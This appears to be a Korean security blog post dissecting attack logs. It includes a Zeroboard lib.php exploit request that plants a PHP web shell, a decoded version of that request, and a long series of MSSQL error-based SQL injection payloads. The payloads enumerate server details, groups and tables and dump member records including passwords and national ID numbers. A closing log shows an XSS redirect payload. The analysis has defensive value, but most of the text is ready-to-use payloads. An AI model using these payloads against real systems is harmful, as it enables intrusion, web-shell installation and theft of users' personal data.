applicationlayer

SharinGan Scanner 1.2.1 이거뭐냐

User-Agent: Mozilla/5.0 (Linux; U; Android 2.1-update1; ko-kr; XT720 Build/STSKT_N_79.11.36R) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17

http://nettok.cox.kr/
http://applicationlayer.cox.kr/

얼마전에 발견한 제로보드공격로그입니다.

PoC를 그대로 썼네요
http://www.milw0rm.com/exploits/9590

/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=

알기쉽게 풀어보면=>

/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(./shell.php,w+),웹쉘내용);/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=

생성된 파일입니다
=====shell.php========
<? system($cmd); ?>

-Information
--Version : ' and @@version=1--
--Db Name : ' and db_name()=0--
--Server Name : ' and @@servername=0--
--Host Name : ' and host_name()=0--
--System User : ' and system_user=0--
--Current User : ' and user=0--
--Privilege : ' and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1--
--Databases :
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  2 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
.
.
.
동일한 응답이 나오면 중단

--Drivers :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),low%20nvarchar(255),high%20nvarchar(255),type%20nvarchar(255));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_availablemedia;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20;drop%20table%20pangolin_test_table;--

--LocalGropus :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
>
' ;drop table pangolin_test_table;--
' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  3 [name],[description] from pangolin_test_table group by


-Data
--Tables(조회)
' and (select cast(count(1) as varchar(10))+char(94) from [sysobjects] where xtype=char(85) and status!=0)=0--
sysobjects의 레코드중 xtype이 u인 갯수 (사용자테이블 갯수)

' and (select top 1 cast(name as varchar(256)) from(select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 3 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
테이블명 추출

--Columns
' and (select top 1 cast(id as nvarchar(20))+char(124)  from [sysobjects] where name=0x6d0065006d00620065007200)=0--
테이블명을 헥사로 변경(우회)하여 id값을 추출 (from sysobjects)

' and (select cast(count(1) as varchar(10))+char(94) from [syscolumns] where id=549576996)=0--
id값을 가진 모든 column갯수 추출 (from syscolumns)

' and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
각 column의 이름 추출 (from syscolumns)
.
.
.
' and (select top 1 cast(name as varchar(8000)) from (select top 2 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
계속 추출

--Datas
' and (select cast(count(1) as varchar(8000))+char(94) from [member] where 1=1)=0--
해당 테이블(member)의 레코드 수 추출

' and (select top 1
isnull(cast([mem_id] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_pwd] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_name] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_jumin] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_zip] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr1] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr2] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_tel] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_hp] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_email] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_wtday] as nvarchar(4000)),char(32))
from [member] where 1=1 order by [mem_id])=0--
각 레코드의  필드값 알아내기

이어서..

웹 방화벽장비에 남은 로그.

XSS공격명으로 기록이 되어있다.

 

GET /XXX.html?xxx=1&xxx=110&xxx=1602&xxx=25&xxx=301&xxx=xxx&xxx=13%22%3E%3Cscript%3Eself.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);%3C/script%3E HTTP/1.1
Host: www.xxx.xx.xx
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate

 

변환

"><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);</script>

 

Mediapartners-Google에 대한 정보는

http://www.internetofficer.com/web-robot/adsense/

에서 찾을 수 있다.